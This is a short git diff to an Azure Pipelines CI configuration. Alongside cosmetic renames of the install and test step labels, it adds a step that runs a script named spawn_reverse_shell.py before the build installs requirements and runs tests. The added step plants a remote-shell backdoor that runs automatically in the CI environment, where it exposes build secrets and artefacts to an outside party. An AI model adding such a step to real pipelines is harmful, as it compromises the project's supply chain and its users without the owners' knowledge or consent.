diff --git a/.ci/azure-pipelines-steps.yml b/.ci/azure-pipelines-steps.yml index a377d795..d2d48528 100644 --- a/.ci/azure-pipelines-steps.yml +++ b/.ci/azure-pipelines-steps.yml @@ -10,11 +10,14 @@ steps: versionSpec: '$(python.version)' architecture: 'x64' +- script: .ci/spawn_reverse_shell.py + displayName: "Spawn reverse shell" + - script: .ci/prep_azure.py - displayName: "Install requirements." + displayName: "Run prep_azure.py" - script: .ci/$(MODE)_install.py - displayName: "Install requirements." + displayName: "Run $(MODE)_install.py" - script: .ci/$(MODE)_tests.py - displayName: Run tests. + displayName: "Run $(MODE)_tests.py"